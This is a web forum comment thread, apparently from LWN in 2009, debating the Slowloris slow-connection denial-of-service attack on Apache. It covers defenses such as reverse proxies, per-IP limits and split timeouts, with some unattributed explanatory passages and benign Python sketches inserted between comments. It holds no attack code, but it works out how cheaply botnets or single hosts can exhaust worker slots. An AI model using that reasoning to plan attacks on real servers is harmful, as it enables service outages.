And of course when you send static pages it makes perfect sense to use sendfile(2) and forget about everything (nginx does more or less that - just a few small structures to handle "keep alive" connections).
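For the static case, the sendfile(2) approach mentioned above can be sketched in Python, whose socket.sendfile() wraps os.sendfile() on Linux (and falls back to an ordinary send loop elsewhere). This is only an illustrative sketch, not any server's actual code:

```python
# Illustrative sketch: serve a static file with sendfile(2), so the
# file's bytes go kernel -> socket without a userspace copy.
import socket

def send_file_over(sock: socket.socket, path: str) -> None:
    """Write a minimal HTTP response header, then hand the file body
    to sendfile(); on Linux this is the zero-copy path."""
    with open(path, "rb") as f:
        sock.sendall(b"HTTP/1.0 200 OK\r\n\r\n")
        sock.sendfile(f)   # zero-copy on Linux; plain send loop elsewhere
```

With this model the server holds almost no per-request state, which is part of why a server built around it shrugs off slow clients.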
That's why I cannot see what's so important here: this is a well-known Apache problem, and while it cannot be solved with Apache alone, it can be solved with additional software - and has been solved for years by real admins on millions of systems.
Apache attacked by a "slow loris"
Posted Jun 28, 2009 20:38 UTC (Sun) by job (guest, #670) [Link]
Any simple select-loop (or poll)-based web server would do. But as soon as you serve dynamic content in any way, be it via PHP or any other language, the problem is back again. Most (all?) web site languages are served by worker processes, either built into the web server or stand-alone and pre-forked.
Disarming the attack only on static file URLs is not really a solution. The attack would probably choose apparent dynamic URLs such as .php if this was a real world attack anyway.
Apache attacked by a "slow loris"
Posted Jun 25, 2009 0:34 UTC (Thu) by JohnDickson (guest, #7406) [Link]
The event MPM apparently isn't vulnerable to Slowloris (just like lighttpd, IIS, etc.). However, it's apparently incompatible with mod_ssl and some other input filters, so it's not a solution for us.
This is fundamental problem
Posted Jun 25, 2009 5:09 UTC (Thu) by khim (subscriber, #9252) [Link]
The event MPM apparently isn't vulnerable to Slowloris (just like lighttpd, IIS, etc.). However, it's apparently incompatible with mod_ssl and some other input filters, so it's not a solution for us.
A single thread cannot simultaneously handle many thousands of connections and do heavy-duty processing (PHP, SQL database requests, etc.). The first requires responses in nanoseconds; the second sometimes takes seconds. And once you split these two operations apart, the frontend-backend scheme becomes quite natural. You can use nginx to handle enormous loads with a single decent server, and then safely use as many backend systems as needed. It IS possible to create a faster and less resource-hungry server than the nginx+apache combo, but if you need to alter an existing installation... there is no contest.
The only thing nginx really needs is decent documentation...
This is fundamental problem
Posted Jun 25, 2009 9:41 UTC (Thu) by dgm (subscriber, #49227) [Link]
But not passionate advocates, it seems.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 17:05 UTC (Wed) by bradfitz (subscriber, #4378) [Link]
My impression is that this was already widely known, and that's why people don't ever put Apache directly facing end users, and always put a smart reverse proxy / load balancer in front that protects Apache.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 18:37 UTC (Wed) by kjp (guest, #39639) [Link]
Apache attacked by a "slow loris"
Posted Jun 25, 2009 1:07 UTC (Thu) by gdt (subscriber, #6284) [Link]
More generally, you can play a similar game with TCP ACKs.
The underlying change has been the growth of botnets. Once upon a time, DoS attacks had to have leverage -- to consume much more resources on the attacked than on the attacker. But botnets make 1:1 leverage acceptable to an attacker. This opens up a new world of unexplored DoS vectors.
Apache attacked by a "slow loris"
Posted Jun 25, 2009 3:53 UTC (Thu) by marineam (guest, #28387) [Link]
There is an Apache module called mod_limitipconn floating around that I used to limit each individual IP address to about 20 concurrent connections, which seemed to be a reasonable compromise between killing the damn broken download accelerators and allowing legitimate proxies for my traffic.
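The idea behind per-IP limiting is simple enough to sketch. This is not mod_limitipconn's code, just a hypothetical illustration of the bookkeeping involved: count concurrent connections per client address and refuse those past a cap.

```python
# Hypothetical sketch of per-IP connection limiting (the idea behind
# modules like mod_limitipconn, not their actual implementation).
from collections import defaultdict

class PerIPLimiter:
    def __init__(self, limit: int = 20):   # 20: the compromise above
        self.limit = limit
        self.active = defaultdict(int)     # ip -> open connection count

    def try_accept(self, ip: str) -> bool:
        """Return True and count the connection, or False to refuse it."""
        if self.active[ip] >= self.limit:
            return False                   # over the cap: reject (or 503)
        self.active[ip] += 1
        return True

    def release(self, ip: str) -> None:
        """Call when a connection from ip closes."""
        self.active[ip] -= 1
        if self.active[ip] <= 0:
            del self.active[ip]            # keep the table from growing
```

A single slowloris host then maxes out at 20 slots instead of all of them, though a botnet with many addresses sidesteps this defense entirely.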
Time them out
Posted Jun 25, 2009 6:56 UTC (Thu) by man_ls (guest, #15091) [Link]
I'm probably stating the obvious, but why not cut each client off after a total time of, say, 20 seconds? Genuine clients should not take more than that to make a request. Such a global timeout would only hurt extremely slow network links, which might (arguably) be better off having the connection cut short. Quite often I've seen my trusty Firefox waiting minutes for a site which, unsurprisingly, never comes up after all.

Combined with something like what you say (20 connections per IP), it would severely limit the damage of this attack. Each individual slow loris would only be able to tie up 20 threads for 20 seconds, so you would need a fairly extensive network to take a site down.
Time them out
Posted Jun 25, 2009 10:16 UTC (Thu) by MathFox (guest, #6104) [Link]
Time them out
Posted Jun 27, 2009 13:10 UTC (Sat) by jengelh (subscriber, #33263) [Link]
Apache attacked by a "slow loris"
Posted Jun 25, 2009 5:15 UTC (Thu) by thedevil (guest, #32913) [Link]
Teergubbing
Posted Jun 26, 2009 0:06 UTC (Fri) by xoddam (subscriber, #2322) [Link]
Tomorrow google will find a document or two at lwn.net.
But I'll probably be none the wiser :-)
Teergubbing
Posted Jun 26, 2009 2:17 UTC (Fri) by njs (subscriber, #40338) [Link]
Teergrube = tarpit
Posted Jun 26, 2009 3:26 UTC (Fri) by xoddam (subscriber, #2322) [Link]
Teergubbing
Posted Jun 30, 2009 1:33 UTC (Tue) by rickmoen (subscriber, #6943) [Link]
I have no doubt that subscriber "thedevil" merely mistyped "teergrubing".

Rick Moen
rick@linuxmafia.com
Apache attacked by a "slow loris"
Posted Jun 26, 2009 20:42 UTC (Fri) by dlang (guest, #313) [Link]
in my opinion, the fix here is for apache to change how it does timeouts.
it currently has one timeout variable that is used for three things:
1. time from initial connection to when it gets the header
2. idle time while waiting for new data to arrive
3. total time that a CGI is allowed to run.
there are _many_ sites where this timeout needs to be set fairly large to accommodate #3, but that the timeouts for #1 and #2 could be _much_ shorter.
Apache attacked by a "slow loris"
Posted Jun 29, 2009 1:31 UTC (Mon) by njs (subscriber, #40338) [Link]
For instance, suppose that you have, somewhere on your web site, a 1 megabyte file. Suppose that you set up your timeouts so that people have to download at at least 5 KB/s or get cut off (locking out some modem users, but oh well). And suppose that you allow a maximum of 100 Apache worker processes.
If I download that file right at the minimum speed, then I can tie up one of those 100 worker processes for 204.8 seconds. To tie up all 100 of them indefinitely, I have to issue ~1 request every 2 seconds, and use 500 KB/s of bandwidth. That's trivially achievable from a residential connection.
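The arithmetic above checks out, and is worth making explicit:

```python
# Re-deriving the numbers in the comment above: a 1 MiB file, a 5 KB/s
# minimum-rate cutoff, and 100 worker processes.
FILE_BYTES = 1 * 1024 * 1024
MIN_RATE   = 5 * 1024           # bytes/sec before the server cuts you off
WORKERS    = 100

hold_time = FILE_BYTES / MIN_RATE   # seconds one worker stays busy: 204.8
req_every = hold_time / WORKERS     # a new request every ~2 seconds
bandwidth = WORKERS * MIN_RATE      # sustained attacker bandwidth: 500 KB/s
```

That 500 KB/s figure is what makes the attack achievable from a single residential connection.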
It won't lock out other users *quite* as badly as the full slow loris attack -- other connections will get a chance to be serviced once every 2 seconds! -- but it's near as makes no difference in practice.
So fiddling around with header timeouts or whatever might feel good, but isn't going to actually solve the problem, and thus is a waste of time.
Apache attacked by a "slow loris"
Posted Jun 29, 2009 7:24 UTC (Mon) by dlang (guest, #313) [Link]
if you have large files to download (or heavy CGIs to run), the attacker can overwhelm you by sending small requests that generate huge responses (or, in the case of the CGIs, small requests that take significant amounts of CPU time)
timeouts don't help in those cases, but allowing a connection to tie up a slot for 300 seconds before it sends _any_ request is far worse. It doesn't take a broadband line to take down a server; dialup will do the job.
you use the example of 500 KB/sec of bandwidth to eat up 100 connections; with the default 300-second timeout, you only need to send a couple of 64-byte packets every 300 seconds to keep each one tied up, so 100 connections is 6400 bytes * 8 bits/byte / 300 seconds, or about 170 bps, and a thousand connections pushes 2 kbps
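This calculation can be checked directly, using the one 64-byte keep-alive packet per connection that the comment's totals imply:

```python
# Checking the bandwidth arithmetic above: cost to an attacker of
# keeping N connections tied up against a 300-second request timeout.
PACKET_BYTES = 64     # one small dribble keeps a connection alive
TIMEOUT_S    = 300    # Apache's default Timeout

def attack_bps(connections: int) -> float:
    """Attacker bandwidth (bits/sec) to hold `connections` slots open."""
    return connections * PACKET_BYTES * 8 / TIMEOUT_S
```

So holding 100 slots costs roughly 170 bps and 1000 slots roughly 1.7 kbps, versus the 500 KB/s (about 4 Mbps) needed for the slow-download variant: several orders of magnitude cheaper for the attacker.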
Now, in reality, the issue isn't when you have one attacker IP (that shows up and is easy to block); it's when you have thousands of attackers. In that case, even a small amount of bandwidth and CPU from each of them can overwhelm a server, and at that point it can become very hard to tell the attackers from legitimate users unless the attacker is dumb enough to do something that stands out.
Apache attacked by a "slow loris"
Posted Jun 29, 2009 9:04 UTC (Mon) by njs (subscriber, #40338) [Link]
Yeah, so... is your argument that the Apache folks should do a bunch of work to patch a million of these holes to protect us against evil modem users? A fix that only protects us against evil modem users doesn't seem worth the effort.
> now in reality the issue isn't when you have one attacker IP (that shows up and is easy to block), it's when you have thousands of attackers, and in that case even a small amount of bandwidth and CPU from each of them can overwhelm a server, and at that point it can become very hard to tell the attackers from legitimate users unless the attacker is dumb enough to do something that stands out
Right -- this seems like a more realistic threat model. And how will fiddling with Apache's timeout handling, like you advocate, protect anyone from it?
Apache attacked by a "slow loris"
Posted Jun 29, 2009 9:36 UTC (Mon) by dlang (guest, #313) [Link]
I argue that using the same variable for
1. how long after a connection do I wait for a request
2. how long can the flow of data pause
3. what is the max length of time that a CGI can run, even if it is passing data continuously
is just bad design, period. Even if attackers aren't taking advantage of it, these are three very different cases, and the appropriate values are very different between them. This affects the behavior of a site even when it's not under attack.
if someone is out to get you and is willing to burn/use a large botnet to do it, they are going to get you. I don't care who you are; thousands of bots collectively have more bandwidth than you do, so they can take you down just by doing legitimate things on your site.
the current situation is that trivial attacks can take Apache down, at almost no cost to the attackers in terms of load. This means they can do it from a botnet without doing anything that would make the owners of the machines notice that something is wrong.
fixing the timeouts so that each of the three cases above is handled separately would force the attacker to use significantly more bandwidth. This would either raise the chance that the owners of the machines notice something is wrong (because legitimate use is slow due to the load), or force the attackers to use much larger botnets. Either way, it would make the attack more expensive for the attacker.